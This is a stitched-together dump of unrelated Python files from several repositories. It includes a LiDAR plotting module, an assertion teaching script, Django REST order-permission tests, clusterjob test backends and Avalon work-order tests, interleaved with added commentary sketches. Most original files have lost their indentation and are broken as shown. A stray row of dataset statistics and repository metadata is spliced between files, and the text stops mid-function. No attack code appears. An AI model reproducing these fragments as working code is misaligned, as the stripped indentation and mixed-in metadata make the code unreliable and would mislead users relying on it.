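# The four-step WH -> STG -> LD -> final chains repeated above could equally be
# built by a small loop. A sketch with a dummy Task class standing in for the
# Airflow operators (the wire_chain helper name is ours, not from this DAG):

```python
class Task:
    """Minimal stand-in for an Airflow operator, for illustration only."""
    def __init__(self, name):
        self.name = name
        self.downstream = []

    def set_downstream(self, other):
        self.downstream.append(other)


def wire_chain(proxy, *tasks):
    """Wire proxy -> tasks[0] -> tasks[1] -> ... in order."""
    upstream = proxy
    for task in tasks:
        upstream.set_downstream(task)
        upstream = task


# Equivalent to the four set_downstream calls of one flow above.
proxy = Task("proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG")
wh, stg, ld, final = (Task(n) for n in (
    "ODS_US_reason_code_WH", "US_reason_code_STG",
    "ODS_US_reason_code_LD", "US_reason_code"))
wire_chain(proxy, wh, stg, ld, final)
```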
# ---- utils/plotly_plot.py (repo: FedeVerstraeten/smnar-lidar-dashboard, license: MIT) ----
import dateutil
import datetime
import plotly
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly.express as px
import pandas as pd
import json
#-----------
# LiDAR
#-----------
def plotly_lidar_signal(lidar_signal,limit_init,limit_final):
# meters to bins
bin_init = int(limit_init/7.5)
bin_final = int(limit_final/7.5)
df=pd.DataFrame({
'meters':lidar_signal.range[bin_init:bin_final],
'TR0_500mV':lidar_signal.raw_signal[bin_init:bin_final],
})
df.index=df['meters']
fig = px.line(df,
x=df.index,
y=df['TR0_500mV'],
title='LiDAR raw signal')
# Set axes titles
fig.update_xaxes(rangeslider_visible=True,title_text="Height [m]")
fig.update_yaxes(title_text="TR0 Raw [mV]",)
fig.update_layout(width=1200, height=500)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
def plotly_lidar_range_correction(lidar_signal,limit_init,limit_final):
# meters to bins
bin_init = int(limit_init/7.5)
bin_final = int(limit_final/7.5)
df=pd.DataFrame({
'meters':lidar_signal.range[bin_init:bin_final],
'TR0_500mV':lidar_signal.rc_signal[bin_init:bin_final],
'TR0_500mV_RF':lidar_signal.adj_factor*lidar_signal.pr2_mol[bin_init:bin_final]
})
df.index=df['meters']
    # rayleigh-fit as a secondary curve would need:
    # fig = make_subplots(specs=[[{"secondary_y": True}]])
    fig = make_subplots()
# Adding traces
fig.add_trace(
go.Scatter(
x=df.index,
y=df["TR0_500mV"],
mode="lines",
name="TR0 500mV",
marker_color='#39ac39',
opacity=1
),
secondary_y=False
)
fig.add_trace(
go.Scatter(
x=df.index,
y=df["TR0_500mV_RF"],
mode="lines",
name="TR0 500mV RF",
marker_color='#b23434',
opacity=0.7
),
secondary_y=False
)
# Add figure title
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="right",
x=0.93),
title={
'text': '<span style="font-size: 20px;">Range corrected LiDAR signal </span><br><span style="font-size: 10px;">(click and drag)</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'},
paper_bgcolor="#ffffff",
plot_bgcolor="#ffffff",
width=640, height=480
# width=800, height=600
)
# display rayleigh-fit range
fig.add_vrect(x0=lidar_signal.fit_init, x1=lidar_signal.fit_final, line_width=0, fillcolor="red", opacity=0.2)
# Set x-axis title
#fig.update_xaxes(tickangle=45,rangeslider_visible=True)
fig.update_xaxes(tickangle=45,title_text="Height [m]")
# Set y-axes titles
fig.update_yaxes(title_text="TR0 RC [mV x m^2] ",
secondary_y=False, showgrid=False)
fig.update_yaxes(title_text="TR0 RC 500mV RF", tickangle=45,
secondary_y=True, showgrid=False)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
def plotly_empty_signal(signal_type):
BIN_LONG_TRANCE = 4000
empty_signal = [0] * BIN_LONG_TRANCE
plot_json = {}
if signal_type == "raw":
df = pd.DataFrame(empty_signal)
df.reset_index(inplace=True)
df.columns=["bin","TR0_500mV"]
fig = px.line(df,
x='bin',
y=['TR0_500mV'],
title='LiDAR raw signal')
fig.update_xaxes(rangeslider_visible=True)
fig.update_layout(width=1200, height=500)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
elif signal_type =="rms":
df = pd.DataFrame(empty_signal)
df.reset_index(inplace=True)
df.columns=["sample","rms_error"]
fig = go.Figure(data=go.Scatter(
x=df['sample'],
y=df["rms_error"],
mode="lines",
name="RMS error",
# title="RMS TMS",
marker_color='#b23434',
opacity=1
))
fig.update_layout(
width=640,
height=480,
title={
'text': '<span style="font-size: 20px;">RMS Error</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'}
)
# Set x-axes titles
fig.update_xaxes(title_text="Sample",rangeslider_visible=False)
# Set y-axes titles
fig.update_yaxes(title_text="Error",showgrid=True)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
elif signal_type == "rangecorrected":
df = pd.DataFrame(empty_signal)
df.reset_index(inplace=True)
df.columns=["bin","TR0_500mV"]
df.index=df['bin']
        fig = make_subplots()  # rayleigh-fit secondary curve?
# Adding traces
fig.add_trace(
go.Scatter(
x=df.index,
y=df["TR0_500mV"],
mode="lines",
name="TR0 500mV",
marker_color='#39ac39',
opacity=1
),
secondary_y=False
)
# Add figure title
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="right",
x=0.93),
title={
'text': '<span style="font-size: 20px;">Range corrected LiDAR signal </span><br><span style="font-size: 10px;">(click and drag)</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'},
paper_bgcolor="#ffffff",
plot_bgcolor="#ffffff",
width=640, height=480
# width=800, height=600
)
# Set x-axis title
fig.update_xaxes(tickangle=45,title_text="Height [m]")
# Set y-axes titles
fig.update_yaxes(title_text="TR0 500mV",
secondary_y=False, showgrid=False)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
def plotly_lidar_rms(lidar_rms):
df = pd.DataFrame(lidar_rms)
df.reset_index(inplace=True)
df.columns=["sample","rms_error"]
fig = go.Figure(data=go.Scatter(
x=df['sample'],
y=df["rms_error"],
mode="lines",
name="RMS error",
# title="RMS TMS",
marker_color='#b23434',
opacity=1
))
fig.update_layout(
width=640,
height=480,
title={
'text': '<span style="font-size: 20px;">RMS Error</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'}
)
# Set x-axes titles
fig.update_xaxes(title_text="Sample",rangeslider_visible=False)
# Set y-axes titles
fig.update_yaxes(title_text="Error",showgrid=True)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
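# Both plotting functions convert a height limit in meters to a bin index by
# dividing by 7.5 (the range resolution implied by the code above). A sketch
# factoring that out (meters_to_bin is our name, not part of this module):

```python
BIN_LENGTH_M = 7.5  # meters per LiDAR range bin, as assumed in the code above

def meters_to_bin(meters):
    """Convert a height in meters to a (truncated) bin index."""
    return int(meters / BIN_LENGTH_M)

# Example: a 0-3000 m window covers bins 0..400.
bin_init = meters_to_bin(0)
bin_final = meters_to_bin(3000)
```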
# ---- predavanje13/assertions.py (repo: Miillky/uvod_u_programiranje, license: MIT) ----
# raise an error when an invalid date is entered
vrijednost = int(input("Enter a date in February:"))
assert 0 < vrijednost < 29, "you entered an invalid date!"

try:
    vrijednost = int(input("Enter a date in February:"))
    assert 0 < vrijednost < 29, "you entered an invalid date!"
except AssertionError:
    print("watch out for the date")

try:
    vrijednost = int(input("Enter a date in February:"))
    assert 0 < vrijednost < 29, "you entered an invalid date!"
except AssertionError as provjera:
    print(provjera)
    print("watch out for the date")
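# The three interactive blocks above repeat the same check; it could be
# wrapped in a reusable validator. A sketch (the function name is ours) that
# also accepts leap years, which the original 0 < vrijednost < 29 range does not:

```python
def validate_february_day(day, leap=False):
    """Return day if it is a valid day of February, else raise AssertionError."""
    last_day = 29 if leap else 28
    assert 0 < day <= last_day, "you entered an invalid date!"
    return day

validate_february_day(28)             # valid in any year
validate_february_day(29, leap=True)  # valid only in leap years
```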
# ---- orders/tests.py (repo: City-of-Turku/munpalvelut_backend, license: MIT) ----
#!/usr/bin/env python
# coding=utf-8
from __future__ import unicode_literals
from django.core.urlresolvers import NoReverseMatch, reverse
from django.core import mail
from rest_framework import status
from rest_framework.test import APITestCase
from palvelutori import test_mixins
from palvelutori.models import User
from organisation.models import Company
from services.models import ServicePackage
from .models import Order
from copy import deepcopy
class OrderTest(test_mixins.BasicCRUDApiTestCaseSetupMixin, APITestCase):
object_class = Order
list_url_user = "api:user-orders-list"
list_url_company = "api:company-orders-list"
detail_url_user = "api:user-orders-detail"
detail_url_company = "api:company-orders-detail"
create_url_user = list_url_user
create_url_company = list_url_company
update_url_user = detail_url_user
update_url_company = detail_url_company
delete_url_user = detail_url_user
delete_url_company = detail_url_company
company = {
"id": 1,
"name": "Image Test",
"businessid": "123456-7",
"service_areas": ["20100", "20200"],
"price_per_hour": 10,
"price_per_hour_continuing": 9,
}
service_package = {
"id": 1,
"shortname": "palvelu-paketti",
"pricing_formula": "???",
"website": "example.com"
}
template_object = {
"user_first_name": "Test",
"user_last_name": "User",
"user_email": "test@example.com",
"user_phone": "+12345678",
"site_address_street": "Ääkköskatu 3",
"site_address_street2": "",
"site_address_postalcode": "12345",
"site_address_city": "Helsinki",
"site_room_count": 4,
"site_sanitary_count": 1,
"site_floor_count": 1,
"site_floor_area": 80.4,
"duration": 4,
"price": 400,
"timeslot_start": "2016-10-10T07:00:00Z",
"timeslot_end": "2016-10-10T11:00:00Z",
"extra_info": "",
"company_id": company['id'],
"service_package_id": service_package['id'],
"service_package_shortname": "palvelu-paketti"
}
@classmethod
def setUpTestData(cls):
template_users = deepcopy(cls.template_users)
template_users['normal_user2'].update({'company_id': cls.company['id']})
cls.template_users = template_users
template_object = deepcopy(cls.template_object)
template_object.update({'user_id': cls.template_users['normal_user1']['id']})
cls.template_object = template_object
Company.objects.create(**cls.company)
ServicePackage.objects.create(**cls.service_package)
super().setUpTestData()
# List
def test_list_anonymous(self):
"""
Anonymous user should NOT be able to list
"""
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': self.template_users['normal_user1']['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_list_normal_user(self):
"""
User should be able to list own orders
"""
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': user['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_list_company_user(self):
"""
Company user should be able to list own companys orders
"""
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': self.template_users['normal_user1']['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
def test_list_staff_user(self):
"""
Staff user should be able to list all orders
"""
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': self.template_users['normal_user1']['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
# Retrieve
def test_detail_anonymous(self):
"""
Anonymous user should NOT be able to retrieve
"""
obj = self.objects[0]
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_detail_normal_user(self):
"""
User should be able to retrieve own orders
"""
obj = self.objects[0]
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_detail_company_user(self):
"""
Company user should be able to retrieve own companys orders
"""
obj = self.objects[0]
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_detail_staff_user(self):
"""
Staff user should be able to retrieve all orders
"""
obj = self.objects[0]
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Create
def test_create_user_order(self):
"""
Anonymous users should not be able to create.
User should be able to create orders for him/herself.
Staff users should be able to create for other users.
"""
TEST_STR = 'Luonti testi'
payload = self.template_object.copy()
payload.pop('company_id', None)
payload.pop('service_package_id', None)
payload.update({
'company': self.company['id'],
'service_package': self.service_package['id'],
'extra_info': TEST_STR
})
url = reverse(
self.create_url_user,
kwargs={ 'user_pk': self.template_users['normal_user1']['id'] }
)
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['extra_info'], TEST_STR)
# Other user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
payload['extra_info'] = ''
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['extra_info'], '')
# Two messages should have been sent
self.assertEqual(len(mail.outbox), 2)
def test_create_company_order(self):
"""
Company orders can not be created.
"""
TEST_STR = 'Luonti testi'
payload = self.template_object.copy()
payload.pop('company_id', None)
payload.pop('service_package_id', None)
payload.update({
'user': self.template_users['normal_user1']['id'],
'service_package': self.service_package['id'],
'extra_info': TEST_STR
})
url = reverse(
self.create_url_company,
kwargs={ 'company_pk': self.company['id'] }
)
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Update
def test_update_user_orders(self):
"""
No one should be able to update user orders
"""
obj = self.objects[0]
url = reverse(
self.update_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
# Anonymous user
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_company_orders(self):
"""
No one should be able to update company orders
"""
obj = self.objects[0]
url = reverse(
self.update_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
# Anonymous user
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Delete
def test_delete_user_orders(self):
"""
No one should be able to delete orders
"""
obj = self.objects[0]
url = reverse(
self.delete_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
# Anonymous user
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_company_orders(self):
"""
No one should be able to delete orders
"""
obj = self.objects[0]
url = reverse(
self.delete_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
# Anonymous user
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
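# Each test above repeats the same login-then-request-then-assert sequence per
# user. That permission matrix could be table-driven; a sketch with a
# hypothetical check_access helper and a dummy client so it runs standalone
# (in the real suite, client would be the APITestCase client and the expected
# codes the DRF status constants):

```python
class DummyResponse:
    def __init__(self, status_code):
        self.status_code = status_code

class DummyClient:
    """Stand-in client: owner gets 405 (method not allowed), others 403."""
    def __init__(self, owner_email):
        self.owner_email = owner_email
        self.user = None
    def login(self, email, password):
        self.user = email
    def put(self, url):
        return DummyResponse(405 if self.user == self.owner_email else 403)

def check_access(client, method, url, cases):
    """cases: list of (user_dict, expected_status); return list of failures."""
    failures = []
    for user, expected in cases:
        client.login(email=user['email'], password=user['password'])
        response = getattr(client, method)(url)
        if response.status_code != expected:
            failures.append((user['email'], response.status_code, expected))
    return failures

client = DummyClient('owner@example.com')
failures = check_access(client, 'put', '/orders/1/', [
    ({'email': 'owner@example.com', 'password': 'x'}, 405),
    ({'email': 'other@example.com', 'password': 'x'}, 403),
])
```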
# ---- run.py (repo: Bakley/bug-free-sniffle, license: MIT) ----
print('We are here')
print('We are following too')
# ---- monique_worker_py/__init__.py (repo: biocad/monique-worker-py, license: BSD-3-Clause) ----
from monique_worker_py.config import *
from monique_worker_py.qmessage import *
from monique_worker_py.task import *
from monique_worker_py.userdata import *
from monique_worker_py.worker import *
from monique_worker_py.component import *
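# These star re-exports pull in every public name from each submodule;
# defining __all__ in a submodule pins down exactly what
# `from module import *` exposes. A minimal sketch using a throwaway module
# (names here are illustrative, not from this package):

```python
import types

# Build a throwaway module to show how __all__ limits star imports.
mod = types.ModuleType("demo")
exec(
    "__all__ = ['public_fn']\n"
    "def public_fn(): return 'ok'\n"
    "def _private(): return 'hidden'\n"
    "def also_public(): return 'defined, but not exported'\n",
    mod.__dict__,
)

# Simulate `from demo import *`: only names listed in __all__ are bound.
exported = {name: getattr(mod, name) for name in mod.__all__}
```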
# ---- tests/test_cli/custom_backends.py (repo: timostrunk/clusterjob, license: MIT) ----
from clusterjob.backends import ClusterjobBackend
class Backend1(object):
    """Backend that has the right interface but does not derive from
    ClusterjobBackend."""
name = 'backend1'
extension = 'slr'
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def get_status(self, response, finished=False):
return 0
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
class Backend2(ClusterjobBackend):
"""Backend that has a missing get_status method"""
name = 'backend2'
extension = 'slr'
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
class Backend3(ClusterjobBackend):
"""Backend that missed 'name' and 'extension' attributes"""
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def get_status(self, response, finished=False):
return 0
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
class Backend4(ClusterjobBackend):
"""Backend that matches the correct interface"""
name = 'backend4'
extension = 'slr'
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def get_status(self, response, finished=False):
return 0
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
| 28.037037 | 68 | 0.641127 | 281 | 2,271 | 5.053381 | 0.206406 | 0.04507 | 0.107042 | 0.04507 | 0.745775 | 0.745775 | 0.745775 | 0.745775 | 0.745775 | 0.745775 | 0 | 0.015504 | 0.261559 | 2,271 | 80 | 69 | 28.3875 | 0.831246 | 0.097754 | 0 | 0.876923 | 0 | 0 | 0.067755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.415385 | false | 0 | 0.015385 | 0.415385 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
c9b69340cd0c437c7a037521df6b014a6045254d | 91,889 | py | Python | tests/automation_framework/tests/work_order_tests/test_submit.py | anjalirx-intel/avalon | 5efd20612948a324b8a393bfe22872aeb8527097 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/tests/work_order_tests/test_submit.py | anjalirx-intel/avalon | 5efd20612948a324b8a393bfe22872aeb8527097 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/tests/work_order_tests/test_submit.py | anjalirx-intel/avalon | 5efd20612948a324b8a393bfe22872aeb8527097 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import logging
import os
import env
from src.libs.avalon_test_wrapper \
import read_json, submit_request
from src.libs.test_base import AvalonBase
from src.utilities.verification_utils \
import verify_test, check_negative_test_responses
from src.utilities.worker_utilities import ResultStatus
logger = logging.getLogger(__name__)
class TestClass():
test_obj = AvalonBase()
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.p1
@pytest.mark.positive
def test_workordersubmit_success(self):
test_id = '18697'
request_file = os.path.join(
env.work_order_input_file,
"work_order_success.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_inDataDataEncryptionKey_hyphenecho(self):
test_id = '18783'
request_file = os.path.join(
env.work_order_input_file,
"work_order_inData_DataEncryptionKey_hyphen_echo.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_datahash_null(self):
test_id = '18713'
request_file = os.path.join(
env.work_order_input_file,
"work_order_data_datahash_null.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for data hash of in data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_requesterId_null(self):
test_id = '18739'
request_file = os.path.join(
env.work_order_input_file,
"work_order_requester_id_null.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_sessionkeyivInDataIv_hexstring(
self):
test_id = '18738'
request_file = os.path.join(
env.work_order_input_file,
"work_order_iv_indata_hex_string.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_verifysignature(self):
test_id = '18450'
request_file = os.path.join(
env.work_order_input_file,
"work_order_verify_signature.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
